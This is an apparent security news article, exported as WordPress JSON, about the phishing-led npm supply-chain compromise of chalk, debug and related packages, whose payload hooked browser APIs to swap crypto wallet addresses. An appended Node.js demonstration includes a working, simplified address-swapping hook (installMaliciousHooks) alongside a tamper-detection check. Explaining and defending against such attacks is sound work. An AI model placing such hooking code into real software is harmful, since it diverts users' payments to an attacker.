{"id":54483,"date":"2026-01-14T11:19:43","date_gmt":"2026-01-14T10:19:43","guid":{"rendered":"https:\/\/cyberant.com\/large-scale-attack-on-popular-npm-packages-millions-of-websites-and-apps-potentially-affected\/"},"modified":"2026-01-14T11:19:43","modified_gmt":"2026-01-14T10:19:43","slug":"large-scale-attack-on-popular-npm-packages-millions-of-websites-and-apps-potentially-affected","status":"publish","type":"post","link":"https:\/\/cyberant.com\/en\/large-scale-attack-on-popular-npm-packages-millions-of-websites-and-apps-potentially-affected\/","title":{"rendered":"Large-scale attack on popular npm packages: millions of websites and apps potentially affected"},"content":{"rendered":"<p data-start=\"424\" data-end=\"810\">Several widely used npm packages (software building blocks) have been infected with malicious code. This happened after a successful phishing attack on one of the maintainers of these building blocks. An npm package is a reusable component that developers pull into their software so they don&#8217;t have to reimplement frequently used functionality every time. As a result, such building blocks end up everywhere: in custom software as well as in standard products. Together, the infected packages are downloaded more than 2 billion times a week by developers worldwide.<\/p>\n<h2 data-start=\"1475\" data-end=\"1502\">Phishing<\/h2>\n<p data-start=\"1503\" data-end=\"1638\">The attackers gained access to the maintainer&#8217;s npm account through a phishing email. The attack targeted Josh Junon (also known as Qix), a developer who maintains several popular packages. Qix has the rights to publish new versions of these packages, so his account alone was sufficient to spread this malware.<\/p>\n<p>Junon received a phishing email that looked very much like it came from npm itself, telling him to renew his two-factor authentication (2FA) via a link before Sept. 10, 2025. When he followed this link, he was taken to a fake website where he entered his username, password and 2FA code.
This data was immediately intercepted by the criminals in a so-called <em data-start=\"399\" data-end=\"424\">Adversary-in-the-Middle attack<\/em>, which gave them access to his account. With that access, the attackers published infected versions of some twenty popular packages to the official npm registry.<\/p>\n<p>On Bluesky, <a href=\"https:\/\/bsky.app\/profile\/bad-at-computer.bsky.social\/post\/3lydioq5swk2y\">Junon responded<\/a>: &#8220;Sorry everyone, I should have paid more attention. Not like me; have had a stressful week. Will work to get this cleaned up.&#8221;<\/p>\n<h2 data-start=\"2269\" data-end=\"2305\">Which packages are affected?<\/h2>\n<p data-start=\"2306\" data-end=\"2378\">Among others, the following npm packages temporarily contained malicious code:<\/p>\n<ul data-start=\"2380\" data-end=\"2701\">\n<li data-start=\"2380\" data-end=\"2458\">\n<p data-start=\"2382\" data-end=\"2458\">chalk (widely used to display colored text in command-line tools)<\/p>\n<\/li>\n<li data-start=\"2459\" data-end=\"2507\">\n<p data-start=\"2461\" data-end=\"2507\">debug (widely used for debug logging)<\/p>\n<\/li>\n<li data-start=\"2508\" data-end=\"2614\">\n<p data-start=\"2510\" data-end=\"2614\">ansi-regex, ansi-styles, wrap-ansi, strip-ansi (components that handle terminal text formatting)<\/p>\n<\/li>\n<li data-start=\"2615\" data-end=\"2701\">\n<p data-start=\"2617\" data-end=\"2701\">color-convert, color-string, color-name (color handling in software)<\/p>\n<\/li>\n<\/ul>\n<p data-start=\"2703\" data-end=\"2884\">Together, these packages account for about two billion downloads per week. Because they are pulled in as dependencies by countless other packages, the infected versions could reach projects that never depend on them directly.<\/p>\n<h2 data-start=\"2891\" data-end=\"2926\">Particular risk for crypto providers<\/h2>\n<p data-start=\"2927\" data-end=\"3009\">Analysis of the malware revealed that it was designed to steal cryptocurrency.
The malicious code first checked whether it was running in a browser and then hooked browser APIs such as <em data-start=\"120\" data-end=\"134\">window.fetch<\/em>, <em data-start=\"136\" data-end=\"152\">XMLHttpRequest<\/em> and <em data-start=\"156\" data-end=\"181\">window.ethereum.request<\/em>. These are the interfaces web pages use to exchange data with servers and to talk to browser-based crypto wallets. By sitting in front of them, the code could silently replace the recipient&#8217;s wallet address with one controlled by the attacker while a payment was being prepared; because the substituted address was chosen to resemble the original, the swap was barely noticeable.<\/p>\n<p data-start=\"4100\" data-end=\"4287\">This is a software supply chain attack: instead of attacking the end user directly, the attacker compromises a link in the chain that produces the software. Similar attacks have been seen before, for example through typosquatting (publishing a package whose name is nearly identical to that of a popular package) or through slopsquatting (registering package names that AI coding assistants invent when they recommend a package that does not exist).<\/p>\n<p>In this case the payload only acts in a browser, and only matters where a crypto wallet or payment is in play, so most software that pulled in the infected versions would never have triggered it. Any build that did pull them in should nevertheless be cleaned up.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Several widely used npm packages (software building blocks) have been infected with malicious code. This happened after a successful phishing attack on one of the maintainers of these building blocks. An npm package is a reusable component that developers pull into their software so they don&#8217;t have to reimplement frequently used functionality every time.
As a [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":54364,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[223],"tags":[183,190,335,188],"class_list":["post-54483","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-en","tag-cyberaanval-en","tag-datalekken-en","tag-supply-chain-attack","tag-vulnerability-management-en"],"_links":{"self":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts\/54483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/comments?post=54483"}],"version-history":[{"count":0,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/posts\/54483\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/media\/54364"}],"wp:attachment":[{"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/media?parent=54483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/categories?post=54483"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cyberant.com\/en\/wp-json\/wp\/v2\/tags?post=54483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
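The article describes the payload wrapping `window.fetch` and `window.ethereum.request` so that wallet addresses are swapped in flight. The following is an added demonstration, not the malware's code and not code from the article's author: a deliberately simplified model of that hooking technique, alongside the snapshot-and-compare check a web application can use to notice that its globals have been re-pointed. It runs under Node.js, where `globalThis`-style object `env` stands in for the browser's `window`; the EIP-1193-shaped wallet provider, the `/api/payment` endpoint, the `eth_sendTransaction` flow and every address are constructed for the example.

```javascript
// Added demonstration, not the malware's or the article author's code: a
// simplified model of the hooking technique the article describes, plus the
// snapshot-and-compare check a web app can use to notice it. Runs under
// Node.js; the `env` object stands in for the browser's `window`, and the
// wallet provider, the server response and all addresses are constructed.

const MERCHANT = "0x1111111111111111111111111111111111111111"; // constructed
const ATTACKER = "0x2222222222222222222222222222222222222222"; // constructed
const ETH_ADDRESS_RE = /0x[0-9a-fA-F]{40}/g;

// Constructed stand-ins for browser globals: a fetch() that "serves" the
// merchant's payment details, and an EIP-1193-style wallet provider that
// records what it is asked to send. Returns the record for inspection.
function installFakeBrowser(target) {
  const sent = [];
  target.fetch = async () => ({
    status: 200,
    text: async () => JSON.stringify({ payTo: MERCHANT, amountWei: "1000" }),
  });
  target.ethereum = {
    async request({ method, params }) {
      if (method !== "eth_sendTransaction") throw new Error("unsupported: " + method);
      sent.push(params[0]);
      return "0x" + "ab".repeat(32); // fake transaction hash
    },
  };
  return sent;
}

// Attacker side: wrap the originals so callers see the same API while every
// address flowing through is swapped for the attacker's. (The real payload
// also checked that it was running in a browser first; omitted here.)
function installMaliciousHooks(target) {
  const origFetch = target.fetch;
  target.fetch = async function (...args) {
    const res = await origFetch.apply(this, args);
    const body = (await res.text()).replace(ETH_ADDRESS_RE, ATTACKER);
    return { ...res, text: async () => body }; // hand back a patched response
  };
  const provider = target.ethereum;
  const origRequest = provider.request.bind(provider);
  provider.request = ({ method, params }) => {
    if (method === "eth_sendTransaction" && params?.[0]) {
      params = [{ ...params[0], to: ATTACKER }]; // divert the recipient
    }
    return origRequest({ method, params });
  };
}

// Defender side, part 1: snapshot the APIs before any third-party bundle runs.
// A changed identity later means something re-pointed the global. In a real
// browser you can additionally require Function.prototype.toString.call(fn)
// to end in "[native code]"; Node's fetch is plain JS, so identity is used.
function snapshotApis(target) {
  return { fetch: target.fetch, request: target.ethereum.request };
}
function tamperedApis(target, snap) {
  const out = [];
  if (target.fetch !== snap.fetch) out.push("fetch");
  if (target.ethereum.request !== snap.request) out.push("ethereum.request");
  return out;
}

// Defender side, part 2: the page fetches payment details and sends the
// transaction. With useSnapshot=true both calls go through the pristine
// references instead of whatever currently hangs off the globals.
async function pay(target, snap, useSnapshot) {
  const fetchFn = useSnapshot ? snap.fetch : target.fetch;
  const requestFn = useSnapshot
    ? snap.request.bind(target.ethereum)
    : target.ethereum.request.bind(target.ethereum);
  const details = JSON.parse(await (await fetchFn("/api/payment")).text());
  await requestFn({
    method: "eth_sendTransaction",
    params: [{ from: "0x" + "33".repeat(20), to: details.payTo, value: details.amountWei }],
  });
  return details.payTo; // the address the page showed the user
}

// Full scenario: load page, snapshot, infected dependency runs, two payments.
async function scenario() {
  const env = {}; // stands in for `window`
  const sent = installFakeBrowser(env);
  const snap = snapshotApis(env); // taken at "page load"
  installMaliciousHooks(env); // the infected package executes

  const shownHooked = await pay(env, snap, false);
  const sentHooked = sent[sent.length - 1].to;
  const shownSafe = await pay(env, snap, true);
  const sentSafe = sent[sent.length - 1].to;
  return { tampered: tamperedApis(env, snap), shownHooked, sentHooked, shownSafe, sentSafe };
}

scenario().then((r) => console.log(JSON.stringify(r, null, 2)));
```

In the hooked path both the address displayed to the user and the address handed to the wallet end up as the attacker's, which is why the article notes the swap was hard to spot; the snapshot path reaches the merchant and `tamperedApis` names both re-pointed globals. The identity check is a heuristic: a payload that runs before the page's own scripts, or that patches `Function.prototype.toString`, defeats it, so it complements rather than replaces pinning dependency versions and auditing lockfiles after an incident like this one.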